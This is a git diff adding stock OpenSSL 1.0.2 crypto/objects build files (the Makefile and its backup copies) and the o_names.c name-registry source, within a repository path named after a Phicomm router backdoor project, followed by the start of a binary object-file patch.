+LIBSRC=	o_names.c obj_dat.c obj_lib.c obj_err.c obj_xref.c
+LIBOBJ= o_names.o obj_dat.o obj_lib.o obj_err.o obj_xref.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= objects.h obj_mac.h
+HEADER=	$(EXHEADER) obj_dat.h obj_xref.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	obj_dat.h obj_xref.h lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+obj_dat.h: obj_dat.pl obj_mac.h
+	$(PERL) obj_dat.pl obj_mac.h obj_dat.h
+
+# objects.pl both reads and writes obj_mac.num
+obj_mac.h: objects.pl objects.txt obj_mac.num
+	$(PERL) objects.pl objects.txt obj_mac.num obj_mac.h
+	@sleep 1; touch obj_mac.h; sleep 1
+
+obj_xref.h: objxref.pl obj_xref.txt obj_mac.num
+	$(PERL) objxref.pl obj_mac.num obj_xref.txt > obj_xref.h
+	@sleep 1; touch obj_xref.h; sleep 1
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+o_names.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+o_names.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+o_names.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+o_names.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+o_names.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+o_names.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+o_names.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+o_names.o: o_names.c
+obj_dat.o: ../../e_os.h ../../include/openssl/asn1.h
+obj_dat.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+obj_dat.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+obj_dat.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+obj_dat.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+obj_dat.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+obj_dat.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+obj_dat.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+obj_dat.o: ../../include/openssl/symhacks.h ../cryptlib.h obj_dat.c obj_dat.h
+obj_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+obj_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+obj_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+obj_err.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+obj_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+obj_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+obj_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+obj_err.o: obj_err.c
+obj_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+obj_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+obj_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+obj_lib.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+obj_lib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+obj_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+obj_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+obj_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+obj_lib.o: ../cryptlib.h obj_lib.c
+obj_xref.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+obj_xref.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+obj_xref.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+obj_xref.o: ../../include/openssl/opensslconf.h
+obj_xref.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+obj_xref.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+obj_xref.o: ../../include/openssl/symhacks.h obj_xref.c obj_xref.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/Makefile.bak
new file mode 100644
index 0000000..a8aedbd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/Makefile.bak
@@ -0,0 +1,130 @@
+#
+# OpenSSL/crypto/objects/Makefile
+#
+
+DIR=	objects
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+PERL=		perl
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	o_names.c obj_dat.c obj_lib.c obj_err.c obj_xref.c
+LIBOBJ= o_names.o obj_dat.o obj_lib.o obj_err.o obj_xref.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= objects.h obj_mac.h
+HEADER=	$(EXHEADER) obj_dat.h obj_xref.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	obj_dat.h obj_xref.h lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+obj_dat.h: obj_dat.pl obj_mac.h
+	$(PERL) obj_dat.pl obj_mac.h obj_dat.h
+
+# objects.pl both reads and writes obj_mac.num
+obj_mac.h: objects.pl objects.txt obj_mac.num
+	$(PERL) objects.pl objects.txt obj_mac.num obj_mac.h
+	@sleep 1; touch obj_mac.h; sleep 1
+
+obj_xref.h: objxref.pl obj_xref.txt obj_mac.num
+	$(PERL) objxref.pl obj_mac.num obj_xref.txt > obj_xref.h
+	@sleep 1; touch obj_xref.h; sleep 1
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+o_names.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+o_names.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+o_names.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+o_names.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+o_names.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+o_names.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+o_names.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+o_names.o: o_names.c
+obj_dat.o: ../../e_os.h ../../include/openssl/asn1.h
+obj_dat.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+obj_dat.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+obj_dat.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+obj_dat.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+obj_dat.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+obj_dat.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+obj_dat.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+obj_dat.o: ../../include/openssl/symhacks.h ../cryptlib.h obj_dat.c obj_dat.h
+obj_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+obj_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+obj_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+obj_err.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+obj_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+obj_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+obj_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+obj_err.o: obj_err.c
+obj_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+obj_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+obj_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+obj_lib.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+obj_lib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+obj_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+obj_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+obj_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+obj_lib.o: ../cryptlib.h obj_lib.c
+obj_xref.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+obj_xref.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+obj_xref.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+obj_xref.o: ../../include/openssl/opensslconf.h
+obj_xref.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+obj_xref.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+obj_xref.o: ../../include/openssl/symhacks.h obj_xref.c obj_xref.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/Makefile.save
new file mode 100644
index 0000000..a8aedbd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/Makefile.save
@@ -0,0 +1,130 @@
+#
+# OpenSSL/crypto/objects/Makefile
+#
+
+DIR=	objects
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+PERL=		perl
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	o_names.c obj_dat.c obj_lib.c obj_err.c obj_xref.c
+LIBOBJ= o_names.o obj_dat.o obj_lib.o obj_err.o obj_xref.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= objects.h obj_mac.h
+HEADER=	$(EXHEADER) obj_dat.h obj_xref.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	obj_dat.h obj_xref.h lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+obj_dat.h: obj_dat.pl obj_mac.h
+	$(PERL) obj_dat.pl obj_mac.h obj_dat.h
+
+# objects.pl both reads and writes obj_mac.num
+obj_mac.h: objects.pl objects.txt obj_mac.num
+	$(PERL) objects.pl objects.txt obj_mac.num obj_mac.h
+	@sleep 1; touch obj_mac.h; sleep 1
+
+obj_xref.h: objxref.pl obj_xref.txt obj_mac.num
+	$(PERL) objxref.pl obj_mac.num obj_xref.txt > obj_xref.h
+	@sleep 1; touch obj_xref.h; sleep 1
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+o_names.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+o_names.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+o_names.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+o_names.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+o_names.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+o_names.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+o_names.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+o_names.o: o_names.c
+obj_dat.o: ../../e_os.h ../../include/openssl/asn1.h
+obj_dat.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+obj_dat.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+obj_dat.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+obj_dat.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+obj_dat.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+obj_dat.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+obj_dat.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+obj_dat.o: ../../include/openssl/symhacks.h ../cryptlib.h obj_dat.c obj_dat.h
+obj_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+obj_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+obj_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+obj_err.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+obj_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+obj_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+obj_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+obj_err.o: obj_err.c
+obj_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+obj_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+obj_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+obj_lib.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+obj_lib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+obj_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+obj_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+obj_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+obj_lib.o: ../cryptlib.h obj_lib.c
+obj_xref.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+obj_xref.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+obj_xref.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+obj_xref.o: ../../include/openssl/opensslconf.h
+obj_xref.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+obj_xref.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+obj_xref.o: ../../include/openssl/symhacks.h obj_xref.c obj_xref.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/o_names.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/o_names.c
new file mode 100644
index 0000000..e1e13a6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/o_names.c
@@ -0,0 +1,363 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include <openssl/err.h>
+#include <openssl/lhash.h>
+#include <openssl/objects.h>
+#include <openssl/safestack.h>
+#include <openssl/e_os2.h>
+
+/*
+ * Later versions of DEC C has started to add lnkage information to certain
+ * functions, which makes it tricky to use them as values to regular function
+ * pointers.  One way is to define a macro that takes care of casting them
+ * correctly.
+ */
+#ifdef OPENSSL_SYS_VMS_DECC
+# define OPENSSL_strcmp (int (*)(const char *,const char *))strcmp
+#else
+# define OPENSSL_strcmp strcmp
+#endif
+
+/*
+ * I use the ex_data stuff to manage the identifiers for the obj_name_types
+ * that applications may define.  I only really use the free function field.
+ */
+DECLARE_LHASH_OF(OBJ_NAME);
+static LHASH_OF(OBJ_NAME) *names_lh = NULL;
+static int names_type_num = OBJ_NAME_TYPE_NUM;
+
+typedef struct name_funcs_st {
+    unsigned long (*hash_func) (const char *name);
+    int (*cmp_func) (const char *a, const char *b);
+    void (*free_func) (const char *, int, const char *);
+} NAME_FUNCS;
+
+DECLARE_STACK_OF(NAME_FUNCS)
+IMPLEMENT_STACK_OF(NAME_FUNCS)
+
+static STACK_OF(NAME_FUNCS) *name_funcs_stack;
+
+/*
+ * The LHASH callbacks now use the raw "void *" prototypes and do
+ * per-variable casting in the functions. This prevents function pointer
+ * casting without the need for macro-generated wrapper functions.
+ */
+
+/* static unsigned long obj_name_hash(OBJ_NAME *a); */
+static unsigned long obj_name_hash(const void *a_void);
+/* static int obj_name_cmp(OBJ_NAME *a,OBJ_NAME *b); */
+static int obj_name_cmp(const void *a_void, const void *b_void);
+
+static IMPLEMENT_LHASH_HASH_FN(obj_name, OBJ_NAME)
+static IMPLEMENT_LHASH_COMP_FN(obj_name, OBJ_NAME)
+
+int OBJ_NAME_init(void)
+{
+    if (names_lh != NULL)
+        return (1);
+    MemCheck_off();
+    names_lh = lh_OBJ_NAME_new();
+    MemCheck_on();
+    return (names_lh != NULL);
+}
+
+int OBJ_NAME_new_index(unsigned long (*hash_func) (const char *),
+                       int (*cmp_func) (const char *, const char *),
+                       void (*free_func) (const char *, int, const char *))
+{
+    int ret;
+    int i;
+    NAME_FUNCS *name_funcs;
+
+    if (name_funcs_stack == NULL) {
+        MemCheck_off();
+        name_funcs_stack = sk_NAME_FUNCS_new_null();
+        MemCheck_on();
+    }
+    if (name_funcs_stack == NULL) {
+        /* ERROR */
+        return (0);
+    }
+    ret = names_type_num;
+    names_type_num++;
+    for (i = sk_NAME_FUNCS_num(name_funcs_stack); i < names_type_num; i++) {
+        MemCheck_off();
+        name_funcs = OPENSSL_malloc(sizeof(NAME_FUNCS));
+        MemCheck_on();
+        if (!name_funcs) {
+            OBJerr(OBJ_F_OBJ_NAME_NEW_INDEX, ERR_R_MALLOC_FAILURE);
+            return (0);
+        }
+        name_funcs->hash_func = lh_strhash;
+        name_funcs->cmp_func = OPENSSL_strcmp;
+        name_funcs->free_func = 0; /* NULL is often declared to * ((void
+                                    * *)0), which according * to Compaq C is
+                                    * not really * compatible with a function
+                                    * * pointer.  -- Richard Levitte */
+        MemCheck_off();
+        sk_NAME_FUNCS_push(name_funcs_stack, name_funcs);
+        MemCheck_on();
+    }
+    name_funcs = sk_NAME_FUNCS_value(name_funcs_stack, ret);
+    if (hash_func != NULL)
+        name_funcs->hash_func = hash_func;
+    if (cmp_func != NULL)
+        name_funcs->cmp_func = cmp_func;
+    if (free_func != NULL)
+        name_funcs->free_func = free_func;
+    return (ret);
+}
+
+/* static int obj_name_cmp(OBJ_NAME *a, OBJ_NAME *b) */
+static int obj_name_cmp(const void *a_void, const void *b_void)
+{
+    int ret;
+    const OBJ_NAME *a = (const OBJ_NAME *)a_void;
+    const OBJ_NAME *b = (const OBJ_NAME *)b_void;
+
+    ret = a->type - b->type;
+    if (ret == 0) {
+        if ((name_funcs_stack != NULL)
+            && (sk_NAME_FUNCS_num(name_funcs_stack) > a->type)) {
+            ret = sk_NAME_FUNCS_value(name_funcs_stack,
+                                      a->type)->cmp_func(a->name, b->name);
+        } else
+            ret = strcmp(a->name, b->name);
+    }
+    return (ret);
+}
+
+/* static unsigned long obj_name_hash(OBJ_NAME *a) */
+static unsigned long obj_name_hash(const void *a_void)
+{
+    unsigned long ret;
+    const OBJ_NAME *a = (const OBJ_NAME *)a_void;
+
+    if ((name_funcs_stack != NULL)
+        && (sk_NAME_FUNCS_num(name_funcs_stack) > a->type)) {
+        ret =
+            sk_NAME_FUNCS_value(name_funcs_stack,
+                                a->type)->hash_func(a->name);
+    } else {
+        ret = lh_strhash(a->name);
+    }
+    ret ^= a->type;
+    return (ret);
+}
+
+const char *OBJ_NAME_get(const char *name, int type)
+{
+    OBJ_NAME on, *ret;
+    int num = 0, alias;
+
+    if (name == NULL)
+        return (NULL);
+    if ((names_lh == NULL) && !OBJ_NAME_init())
+        return (NULL);
+
+    alias = type & OBJ_NAME_ALIAS;
+    type &= ~OBJ_NAME_ALIAS;
+
+    on.name = name;
+    on.type = type;
+
+    for (;;) {
+        ret = lh_OBJ_NAME_retrieve(names_lh, &on);
+        if (ret == NULL)
+            return (NULL);
+        if ((ret->alias) && !alias) {
+            if (++num > 10)
+                return (NULL);
+            on.name = ret->data;
+        } else {
+            return (ret->data);
+        }
+    }
+}
+
+int OBJ_NAME_add(const char *name, int type, const char *data)
+{
+    OBJ_NAME *onp, *ret;
+    int alias;
+
+    if ((names_lh == NULL) && !OBJ_NAME_init())
+        return (0);
+
+    alias = type & OBJ_NAME_ALIAS;
+    type &= ~OBJ_NAME_ALIAS;
+
+    onp = (OBJ_NAME *)OPENSSL_malloc(sizeof(OBJ_NAME));
+    if (onp == NULL) {
+        /* ERROR */
+        return (0);
+    }
+
+    onp->name = name;
+    onp->alias = alias;
+    onp->type = type;
+    onp->data = data;
+
+    ret = lh_OBJ_NAME_insert(names_lh, onp);
+    if (ret != NULL) {
+        /* free things */
+        if ((name_funcs_stack != NULL)
+            && (sk_NAME_FUNCS_num(name_funcs_stack) > ret->type)) {
+            /*
+             * XXX: I'm not sure I understand why the free function should
+             * get three arguments... -- Richard Levitte
+             */
+            sk_NAME_FUNCS_value(name_funcs_stack,
+                                ret->type)->free_func(ret->name, ret->type,
+                                                      ret->data);
+        }
+        OPENSSL_free(ret);
+    } else {
+        if (lh_OBJ_NAME_error(names_lh)) {
+            /* ERROR */
+            return (0);
+        }
+    }
+    return (1);
+}
+
+int OBJ_NAME_remove(const char *name, int type)
+{
+    OBJ_NAME on, *ret;
+
+    if (names_lh == NULL)
+        return (0);
+
+    type &= ~OBJ_NAME_ALIAS;
+    on.name = name;
+    on.type = type;
+    ret = lh_OBJ_NAME_delete(names_lh, &on);
+    if (ret != NULL) {
+        /* free things */
+        if ((name_funcs_stack != NULL)
+            && (sk_NAME_FUNCS_num(name_funcs_stack) > ret->type)) {
+            /*
+             * XXX: I'm not sure I understand why the free function should
+             * get three arguments... -- Richard Levitte
+             */
+            sk_NAME_FUNCS_value(name_funcs_stack,
+                                ret->type)->free_func(ret->name, ret->type,
+                                                      ret->data);
+        }
+        OPENSSL_free(ret);
+        return (1);
+    } else
+        return (0);
+}
+
+struct doall {
+    int type;
+    void (*fn) (const OBJ_NAME *, void *arg);
+    void *arg;
+};
+
+static void do_all_fn_doall_arg(const OBJ_NAME *name, struct doall *d)
+{
+    if (name->type == d->type)
+        d->fn(name, d->arg);
+}
+
+static IMPLEMENT_LHASH_DOALL_ARG_FN(do_all_fn, const OBJ_NAME, struct doall)
+
+void OBJ_NAME_do_all(int type, void (*fn) (const OBJ_NAME *, void *arg),
+                     void *arg)
+{
+    struct doall d;
+
+    d.type = type;
+    d.fn = fn;
+    d.arg = arg;
+
+    lh_OBJ_NAME_doall_arg(names_lh, LHASH_DOALL_ARG_FN(do_all_fn),
+                          struct doall, &d);
+}
+
+struct doall_sorted {
+    int type;
+    int n;
+    const OBJ_NAME **names;
+};
+
+static void do_all_sorted_fn(const OBJ_NAME *name, void *d_)
+{
+    struct doall_sorted *d = d_;
+
+    if (name->type != d->type)
+        return;
+
+    d->names[d->n++] = name;
+}
+
+static int do_all_sorted_cmp(const void *n1_, const void *n2_)
+{
+    const OBJ_NAME *const *n1 = n1_;
+    const OBJ_NAME *const *n2 = n2_;
+
+    return strcmp((*n1)->name, (*n2)->name);
+}
+
+void OBJ_NAME_do_all_sorted(int type,
+                            void (*fn) (const OBJ_NAME *, void *arg),
+                            void *arg)
+{
+    struct doall_sorted d;
+    int n;
+
+    d.type = type;
+    d.names =
+        OPENSSL_malloc(lh_OBJ_NAME_num_items(names_lh) * sizeof *d.names);
+    d.n = 0;
+    OBJ_NAME_do_all(type, do_all_sorted_fn, &d);
+
+    qsort((void *)d.names, d.n, sizeof *d.names, do_all_sorted_cmp);
+
+    for (n = 0; n < d.n; ++n)
+        fn(d.names[n], arg);
+
+    OPENSSL_free((void *)d.names);
+}
+
+static int free_type;
+
+static void names_lh_free_doall(OBJ_NAME *onp)
+{
+    if (onp == NULL)
+        return;
+
+    if (free_type < 0 || free_type == onp->type)
+        OBJ_NAME_remove(onp->name, onp->type);
+}
+
+static IMPLEMENT_LHASH_DOALL_FN(names_lh_free, OBJ_NAME)
+
+static void name_funcs_free(NAME_FUNCS *ptr)
+{
+    OPENSSL_free(ptr);
+}
+
+void OBJ_NAME_cleanup(int type)
+{
+    unsigned long down_load;
+
+    if (names_lh == NULL)
+        return;
+
+    free_type = type;
+    down_load = lh_OBJ_NAME_down_load(names_lh);
+    lh_OBJ_NAME_down_load(names_lh) = 0;
+
+    lh_OBJ_NAME_doall(names_lh, LHASH_DOALL_FN(names_lh_free));
+    if (type < 0) {
+        lh_OBJ_NAME_free(names_lh);
+        sk_NAME_FUNCS_pop_free(name_funcs_stack, name_funcs_free);
+        names_lh = NULL;
+        name_funcs_stack = NULL;
+    } else
+        lh_OBJ_NAME_down_load(names_lh) = down_load;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/o_names.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/o_names.o
new file mode 100644
index 0000000000000000000000000000000000000000..2e0f5a2b62b7adfddc4cbb9a3d9a0b7992bc0fd5
GIT binary patch
literal 7664
zcmbtYdu&_P89%Yz#4YWO*HtXM&FWO9fM@q1ny#SS#7=IglaxIA4j0$CB_WP&?CUOF
zyFO%6xVjB{!PryU9|$oqZIxCgR-`3bfM{cE2#Ur8(yFaxt-^SWfhHdHzVF;~?31(H
zzxX8IbMEi_zQ_5_ch0@nM-#~oPhB11Qb+C}wL6XylE1pvZ>8N<qL3BjgU0JWw(DCO
zN-L6fM?kYX{7LJD%DGvJH{4ub>K@dr5BoLile;wgc2v|RD`xm2_U!d7?;W|0!4%Q#
zl3%kA!LQZ7d(Tki90zvp8M=fj)UIaNYjz$;4VpdSr#QMpCxVX~YCcvi^l`{v3Cu4=
zKaSJ%7x!qfm#OKhF*>J}TDrrh+1ve7TAkJ7)2uDOa{?&SnUK;Q+ort`m1AaVV?(7<
